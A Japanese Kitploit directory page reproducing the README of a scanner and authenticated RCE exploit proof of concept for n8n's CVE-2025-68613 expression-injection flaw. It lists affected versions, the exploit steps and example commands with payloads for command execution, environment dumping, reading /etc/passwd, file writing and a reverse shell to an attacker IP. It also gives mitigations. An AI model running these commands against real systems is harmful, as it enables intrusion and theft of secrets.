Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
n8n-cve-2025-68613 — n8n の CVE-2025-68613 用の認証済み RCE エクスプロイト PoC および脆弱性スキャナー。許可されたセキュリティテスト用に、コマンド実行、ファイル操作、リバースシェルペイロードをサポートします。 | Kitploit
ツール/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツールペイロード開発
GitHubgagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

n8n の CVE-2025-68613 用の認証済み RCE エクスプロイト PoC および脆弱性スキャナー。許可されたセキュリティテスト用に、コマンド実行、ファイル操作、リバースシェルペイロードをサポートします。

リポジトリを見る
149ヶ月前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68613 – n8n 式インジェクション RCE

Python Security CVE Status

このツールキットは、n8n Workflow Automation Platform の重大な脆弱性 CVE-2025-68613 に対する スキャナおよび PoC エクスプロイト を提供します。

このリポジトリは、n8n Workflow Automation Platform に影響する重大な脆弱性 CVE-2025-68613 のための スキャナおよび PoC エクスプロイトスクリプト を提供します。


警告 / 注意

インドネシア語

このツールは許可された正当なセキュリティテスト専用です。所有者の許可なくこのツールをシステムで使用することは禁止されています。

英語

このツールは許可された合法的なセキュリティテスト専用です。無断使用は違法であり、禁止されています。


脆弱性の概要

  • CVE ID : CVE-2025-68613
  • 重要度 : 緊急
  • CVSS : 10.0
  • 種別 : 式インジェクション → リモートコード実行 (RCE)
  • 製品 : n8n Workflow Automation Platform

影響を受けるバージョン

  • 0.211.0 – 1.120.3
  • 1.121.0

修正済みバージョン

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

リポジトリ構造

.
├── tot-scanner-2025-68613.py   # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py   # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md

スキャナ(非エクスプロイト)

スキャナは以下のために使用されます:

  • n8n サービスを検出する
  • n8n のバージョンを抽出する
  • 脆弱性の状態を判定する
  • エクスプロイトを行わない
  • JSON出力 をサポートする

スキャナ:

  • n8nサービス を検出します
  • n8n のバージョンを抽出します
  • 脆弱性の状態を判定します
  • エクスプロイトなし
  • JSON出力 をサポートします

スキャナは以下のエンドポイントを確認します:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

依存関係 / 要件

インドネシア語

必要なパッケージ:

  • requests

requirements.txt の内容:

requests>=2.28.0

英語

必要なパッケージ:

  • requests

requirements.txt の内容:

requests>=2.28.0

インストール

pip install -r requirements.txt

スキャナの使用法

python3 tot-scanner-2025-68613.py -u http://target.com:5678

スキャナのJSONモード

python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

スキャナのJSON出力例

{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

スキャナの終了コード

コード意味
0脆弱ではない
1バージョン不明
2脆弱

Exploit PoC(認証済みRCE)

このエクスプロイトには有効な n8n の認証情報が必要です
認証済みアクセスが必須です

エクスプロイトの動作手順:

  1. n8n にログインする
  2. ワークフローを作成する
  3. Set ノードに悪意のある式を注入する
  4. ワークフローを実行する
  5. (任意)ワークフローのクリーンアップ

エクスプロイトの引数

引数必須説明
-u / --url✅ターゲット n8n URL
-e / --email✅n8n アカウントのメールアドレス
-p / --password✅n8n アカウントのパスワード
--payload✅ペイロードタイプ
--command❌OSコマンド (cmd)
--file❌ファイルパス (read/write)
--content❌ファイル内容 (write)
--lhost❌攻撃者のIP (revshell)
--lport❌攻撃者のポート (revshell)
--verify-ssl❌SSL証明書を検証

対応ペイロード

ペイロード機能
infoシステム情報
cmdコマンド実行
env環境変数ダンプ
readファイル読み取り
writeファイル書き込み
revshellリバースシェル

Screen Capture

エクスプロイトの使用例

システム情報

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

コマンド実行

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

ファイル読み取り

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

ファイル書き込み

python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

リバースシェル

nc -lvnp 4444
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

緩和策

  • 修正済みバージョンに n8n をアップグレードする
  • /rest/* エンドポイントへのアクセスを制限する
  • RBAC と強力な認証を適用する
  • 不明なワークフローを監査する

免責事項

このプロジェクトは教育目的および許可されたセキュリティテスト専用に提供されています。
著者は不正使用について責任を負いません。


GitHub トピック

n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

法令を遵守しましょう。倫理的に行動しましょう。

ツールをダウンロード